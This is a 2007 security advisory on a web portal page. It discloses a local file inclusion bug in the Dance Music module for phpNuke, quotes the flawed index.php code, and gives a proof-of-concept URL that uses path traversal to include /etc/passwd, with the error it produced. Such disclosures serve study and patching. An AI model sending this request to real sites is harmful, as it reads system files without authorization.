[waraxe-2007-SA#054] - Local File Inclusion in Dance Music module for phpNuke

Login or Register

:: Home :: Search :: Your Account :: Forums :: Waraxe Advisories :: Tools ::

June 19, 2013

Menu

Home

Discussions

	Forums
	Members List
	IRC chat

Tools

	Base64 coder
	MD5 hash
	CRC32 checksum
	ROT13 coder
	SHA-1 hash
	URL-decoder
	Sql Char Encoder

Affiliates

	y3dips ITsec
	Md5 Cracker
	User Manuals
	AlbumNow

Content

	Content
	Sections
	FAQ
	Top

Info

	Feedback
	Recommend Us
	Search
	Journal
	Your Account

User Info

Membership:

Latest: mattbaez25

New Today: 1

New Yesterday: 2

Overall: 8679

People Online:

Visitors: 121

Members: 3

Total: 124

Online Now:
01: Cyko - Your Account
02: myg3nx - Homepage
03: pirate-sky - Homepage

milw0rm

·[web applications] - Your Online Agents Sql Injection Vulnerability
·[web applications] - Joomla Component com_abcalendar Blind Injection Vulnerability
·[dos / poc] - Easy LAN Folder Share Version 3.2.0.100 - Buffer Overflow
·[web applications] - LibrettoCMS 2.2.2 Malicious File Upload Vulnerability
·[web applications] - Lead Capture Page System Multiple Vulnerabilties
·[web applications] - 230CMS Remote Code Execution Exploit
·[web applications] - Terra.com.br LFI Vulnerability + Smart Exploit 0day
·[web applications] - Abril.com.br PHP Code Execution Vulnerability + Exploit 0day
·[web applications] - Sony CH / DH Cross Site Request Forgery Vulnerability
·[web applications] - TP-LINK TL-SC3171 Authentication Bypass Vulnerability

read more...

PacketStorm News

·Mandriva Linux Security Advisory 2013-174
·Avira AntiVir Engine Denial Of Service / Filter Evasion
·Ubuntu Security Notice USN-1883-1
·Ubuntu Security Notice USN-1882-1
·Ubuntu Security Notice USN-1881-1
·Ubuntu Security Notice USN-1880-1
·Ubuntu Security Notice USN-1879-1
·Ubuntu Security Notice USN-1878-1
·Ubuntu Security Notice USN-1877-1
·Ubuntu Security Notice USN-1876-1

read more...

[waraxe-2007-SA#054] - Local File Inclusion in Dance Music module for phpNuke

Author: Janek Vind "waraxe"
Date: 25. September 2007
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-54.html

Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.bestdownload.biz/modules.php?name=Downloads&d_op=viewdownloaddetails
&lid=251&title=Dance%20Music%20for%20PHP-Nuke

Dance Music for PHP-Nuke
by MultiMedia http://www.multimedia.com.ro
and Nicolae Sfetcu http://www.sfetcu.com

Vulnerabilities: Local File Inclusion in "index.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Let's take a peek at source code of "index.php":

------------>[source code]<------------

include("header.php");
...
$ACCEPT_FILE['Acid_house.html'] = 'Acid_house.html';
$ACCEPT_FILE['Alternative_dance.html'] = 'Alternative_dance.html';
$ACCEPT_FILE['Ambient_house.html'] = 'Ambient_house.html';
...
$page = $_GET['page'];
...
$pagename = $ACCEPT_FILE[$page];
if (!isSet($pagename)) $pagename = "index.html";
include("modules/Dance_Music-MM/$pagename");

------------>[/source code]<-----------

As we can see, "$ACCEPT_FILE" array is uninitialized, so we can insert there
arbitrary values from $_GET/$_POST/$_COOKIES parameters, if "register_globals"
is active.

Proof-of-concept test:

http://victim.com/modules.php?name=Dance_Music-MM&page=1
&ACCEPT_FILE[1]=../../../../../../../../../etc/passwd

Warning: main() [function.main]: open_basedir restriction in effect.
File(./modules/Dance_Music-MM/../../../../../../../../../../../../etc/passwd
) is not within the allowed path(s): (/home/www/web32/)
in /home/www/web32/html/portal/modules/Dance_Music-MM/index.php on line 154

So local file inclusion exists, but safe mode can make exploiting harder.

//-----> See ya soon and have a nice day ;) <-----//

Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb
and anyone else who know me!
Greetings to Raido Kerna.
Tervitusi Torufoorumi rahvale!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/

Copyright © by Waraxe IT Security Portal All Right Reserved.

Published on: 2007-09-25 (5269 reads)

Top members by posts

waraxe - 2405

vince213333 - 736

pexli - 665

Mullog - 539

demon - 480

shai-tan - 477

LINUX - 404

Cyko - 371

tsabitah - 328

y3dips - 281

SecurityFocus

·Vuln: Novell ZENworks Configuration Management CVE-2013-1095 Cross-Site Scripting Vulnerability
·Vuln: RETIRED: Microsoft June 2013 Advance Notification Multiple Vulnerabilities
·Vuln: PHP 'php-cgi' Information Disclosure Vulnerability
·Vuln: Module::Signature CVE-2013-2145 Local Arbitrary Code Execution Vulnerability
·Bugtraq: [ MDVSA-2013:173 ] subversion
·Bugtraq: LSE Leading Security Experts GmbH - LSE-2013-06-13 - Avira AntiVir Engine
·Bugtraq: [SECURITY] [DSA 2707-1] dbus security update
·Bugtraq: Re: WordPress 3.5.1, Denial of Service
·More rss feeds from SecurityFocus

read more...

alexa

Book Opinions
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.049 Seconds